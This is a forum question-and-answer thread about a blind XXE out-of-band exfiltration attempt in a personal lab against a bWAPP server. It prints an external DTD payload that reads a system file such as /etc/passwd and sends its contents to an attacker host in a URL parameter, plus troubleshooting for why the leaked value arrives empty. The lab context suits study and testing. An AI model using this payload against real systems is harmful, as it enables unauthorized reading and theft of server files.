Blind XXE - Exfiltration Data via OOB

Question

My lab

Kali Linux:192.168.171.134
bWApp Server: http://192.168.171.131

I want to do an exfiltration data via HTTP on this Blind XXE.

This is the External.DTD:

   <!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://192.168.171.134/?x=%file;'>">
   %eval;
   %exfiltrate;

This is following attempt to exploit it:

As you can see the Vulnerable Web Application does an HTTP Request to recall the evil.DTD, but when it does the HTTP GET with /etc/passwd the GET parameter is empty, why?

I also try to modified the /etc/passwd with /etc/hostname to avoid the possible <> problems inside that file, but it doesn't work.

I removed your screenshots because the images were not found. — Soufiane Tahiri, Mar 01 '21 at 15:50

score 1 · Answer 1 · answered Mar 06 '21 at 07:06

Well, there could be many reasons (sorted by order of probability):

The XML parser is running inside Docker: If it's running inside docker, there's no /etc/passwd file nor /etc/hostname file to leak.
The XML parser does not have enough privileges to read those files.
The files you're trying to leak are in a different encoding than expected (Expected UTF-8, got UTF-16).
The files you're trying to leak is corrupted.
The files you're trying to leak is empty.

For all of the previous cases: instead of returning a nasty error, it returns an empty string, hence why the x parameter in the GET request is empty.

Thanks for the answer 1) It's a another VM 2) I tried to switch into www-data user (on bwapp server) and i can see the /etc/passwd file with cat command 3) i forced the UTF-8 and UTF-16 but it doesn't work, i insert in the HTTP request the following XML code: ... / ... 4) I don't think, how can i check? 5) it's not empty. If i use ftp:// instead HTTP:// i also get the same X value empty — Zefiro38, Mar 07 '21 at 13:33

Blind XXE - Exfiltration Data via OOB

1 Answers1